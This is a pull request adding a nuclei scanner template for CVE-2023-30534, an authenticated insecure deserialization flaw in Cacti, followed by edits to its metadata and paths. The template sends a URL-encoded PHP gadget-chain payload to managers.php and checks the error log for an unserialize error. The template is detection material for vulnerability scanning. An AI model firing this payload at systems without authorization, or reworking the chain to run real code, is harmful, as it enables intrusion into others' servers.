### PR TITLE
Create CVE-2023-30534 template for cacti insecure deserialization of filter data

### DIFF
--- a/http/cves/2023/CVE-2023-30534.yaml
+++ b/http/cves/2023/CVE-2023-30534.yaml
@@ -1,0 +1,63 @@
+id: CVE-2023-30534
+
+info:
+  name: Cacti < 1.2.25 Insecure Deserialization
+  author: k0pak4
+  severity: low
+  description: |
+    Cacti versions before 1.2.25 are vulnerable to an authenticated insecure deserialization.
+  reference:
+    - https://github.com/Cacti/cacti/security/advisories/GHSA-77rf-774j-6h3p
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
+    cvss-score: 4.3
+    cve-id: CVE-2023-30534
+    cwe-id: CWE-502
+  metadata:
+    shodan-query: title:"Cacti"
+    verified: "true"
+  tags: authenticated
+
+http:
+  - raw:
+      - |
+        GET /cacti/index.php HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        POST /cacti/index.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        __csrf_magic={{url_encode(csrf_token)}}&action=login&login_username={{username}}&login_password={{password}}
+      - |
+        POST /cacti/managers.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        action=actions&action_receiver_notifications=1&selected_items=a%3A2%3A%7Bi%3A7%3Ba%3A1%3A%7Bi%3A0%3BO%3A18%3A%22phpseclib%5CNet%5CSSH1%22%3A2%3A%7Bs%3A6%3A%22bitmap%22%3Bi%3A1%3Bs%3A6%3A%22crypto%22%3BO%3A19%3A%22phpseclib%5CCrypt%5CAES%22%3A8%3A%7Bs%3A10%3A%22block_size%22%3BN%3Bs%3A12%3A%22inline_crypt%22%3Ba%3A2%3A%7Bi%3A0%3BO%3A25%3A%22phpseclib%5CCrypt%5CTripleDES%22%3A6%3A%7Bs%3A10%3A%22block_size%22%3Bs%3A30%3A%221%29%7B%7D%7D%7D%3B+ob_clean%28%29%3Blsdie%28%29%3B+%3F%3E%22%3Bs%3A12%3A%22inline_crypt%22%3BN%3Bs%3A16%3A%22use_inline_crypt%22%3Bi%3A1%3Bs%3A7%3A%22changed%22%3Bi%3A0%3Bs%3A6%3A%22engine%22%3Bi%3A1%3Bs%3A4%3A%22mode%22%3Bi%3A1%3B%7Di%3A1%3Bs%3A26%3A%22_createInlineCryptFunction%22%3B%7Ds%3A16%3A%22use_inline_crypt%22%3Bi%3A1%3Bs%3A7%3A%22changed%22%3Bi%3A0%3Bs%3A6%3A%22engine%22%3Bi%3A1%3Bs%3A4%3A%22mode%22%3Bi%3A1%3Bs%3A6%3A%22bitmap%22%3Bi%3A1%3Bs%3A6%3A%22crypto%22%3Bi%3A1%3B%7D%7D%7Di%3A7%3Bi%3A7%3B%7D&drp_action=2&__csrf_magic={{url_encode(csrf_token)}}
+      - |
+        GET /cacti/clog.php HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body_4
+        regex:
+          - "<table[^;]*;['\"]>\\s*(<tr class=['\"]clogError['\"]>[\\s\\S]*unserialize[\\s\\S]*managers.php[\\s\\S]*[Aa]uthenticated)"
+        condition: and
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: regex
+        name: csrf_token
+        part: body
+        group: 1
+        regex:
+          - "var csrfMagicToken = ['\"]([a-z0-9,:;]*)['\"]"
+        internal: true

--- a/http/cves/2023/CVE-2023-30534.yaml
+++ b/http/cves/2023/CVE-2023-30534.yaml
@@ -9,6 +9,7 @@ info:
   reference:
     - https://github.com/Cacti/cacti/security/advisories/GHSA-77rf-774j-6h3p
     - https://nvd.nist.gov/vuln/detail/CVE-2023-30534
+    - https://www.fastly.com/blog/cve-2023-30534-insecure-deserialization-in-cacti-prior-to-1-2-25
   remediation: This issue has been addressed in version 1.2.25.
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

--- a/http/cves/2023/CVE-2023-30534.yaml
+++ b/http/cves/2023/CVE-2023-30534.yaml
@@ -3,41 +3,48 @@ id: CVE-2023-30534
 info:
   name: Cacti < 1.2.25 Insecure Deserialization
   author: k0pak4
-  severity: low
+  severity: medium
   description: |
-    Cacti versions before 1.2.25 are vulnerable to an authenticated insecure deserialization.
+    Cacti is an open source operational monitoring and fault management framework. There are two instances of insecure deserialization in Cacti version 1.2.24. 
   reference:
     - https://github.com/Cacti/cacti/security/advisories/GHSA-77rf-774j-6h3p
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-30534
+  remediation: This issue has been addressed in version 1.2.25.
   classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
     cvss-score: 4.3
     cve-id: CVE-2023-30534
     cwe-id: CWE-502
+    epss-score: 0.00073
+    epss-percentile: 0.30351
+    cpe: cpe:2.3:a:cacti:cacti:*:*:*:*:*:*:*:*
   metadata:
     shodan-query: title:"Cacti"
     verified: "true"
-  tags: authenticated
+  tags: cve,cve2023,cacti,authenticated
 
 http:
   - raw:
       - |
-        GET /cacti/index.php HTTP/1.1
+        GET /index.php HTTP/1.1
         Host: {{Hostname}}
 
       - |
-        POST /cacti/index.php HTTP/1.1
+        POST /index.php HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
 
         __csrf_magic={{url_encode(csrf_token)}}&action=login&login_username={{username}}&login_password={{password}}
+
       - |
-        POST /cacti/managers.php HTTP/1.1
+        POST /managers.php HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
 
         action=actions&action_receiver_notifications=1&selected_items=a%3A2%3A%7Bi%3A7%3Ba%3A1%3A%7Bi%3A0%3BO%3A18%3A%22phpseclib%5CNet%5CSSH1%22%3A2%3A%7Bs%3A6%3A%22bitmap%22%3Bi%3A1%3Bs%3A6%3A%22crypto%22%3BO%3A19%3A%22phpseclib%5CCrypt%5CAES%22%3A8%3A%7Bs%3A10%3A%22block_size%22%3BN%3Bs%3A12%3A%22inline_crypt%22%3Ba%3A2%3A%7Bi%3A0%3BO%3A25%3A%22phpseclib%5CCrypt%5CTripleDES%22%3A6%3A%7Bs%3A10%3A%22block_size%22%3Bs%3A30%3A%221%29%7B%7D%7D%7D%3B+ob_clean%28%29%3Blsdie%28%29%3B+%3F%3E%22%3Bs%3A12%3A%22inline_crypt%22%3BN%3Bs%3A16%3A%22use_inline_crypt%22%3Bi%3A1%3Bs%3A7%3A%22changed%22%3Bi%3A0%3Bs%3A6%3A%22engine%22%3Bi%3A1%3Bs%3A4%3A%22mode%22%3Bi%3A1%3B%7Di%3A1%3Bs%3A26%3A%22_createInlineCryptFunction%22%3B%7Ds%3A16%3A%22use_inline_crypt%22%3Bi%3A1%3Bs%3A7%3A%22changed%22%3Bi%3A0%3Bs%3A6%3A%22engine%22%3Bi%3A1%3Bs%3A4%3A%22mode%22%3Bi%3A1%3Bs%3A6%3A%22bitmap%22%3Bi%3A1%3Bs%3A6%3A%22crypto%22%3Bi%3A1%3B%7D%7D%7Di%3A7%3Bi%3A7%3B%7D&drp_action=2&__csrf_magic={{url_encode(csrf_token)}}
+
       - |
-        GET /cacti/clog.php HTTP/1.1
+        GET /clog.php HTTP/1.1
         Host: {{Hostname}}
 
     cookie-reuse: true

--- a/http/cves/2023/CVE-2023-30534.yaml
+++ b/http/cves/2023/CVE-2023-30534.yaml
@@ -5,7 +5,7 @@ info:
   author: k0pak4
   severity: medium
   description: |
-    Cacti is an open source operational monitoring and fault management framework. There are two instances of insecure deserialization in Cacti version 1.2.24. 
+    Cacti is an open source operational monitoring and fault management framework. There are two instances of insecure deserialization in Cacti version 1.2.24.
   reference:
     - https://github.com/Cacti/cacti/security/advisories/GHSA-77rf-774j-6h3p
     - https://nvd.nist.gov/vuln/detail/CVE-2023-30534


### PR DESCRIPTION
### PR Information

- Added CVE-2023-30534
- References: https://github.com/Cacti/cacti/security/advisories/GHSA-77rf-774j-6h3p

### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO


#### Additional Details
Screenshot of template use against Cacti 1.2.24 (have tested on 1.2.10 as well)
<img width="852" alt="image" src="https://github.com/projectdiscovery/nuclei-templates/assets/9121784/879af42e-6ef8-40df-ae02-fe42e95657de">
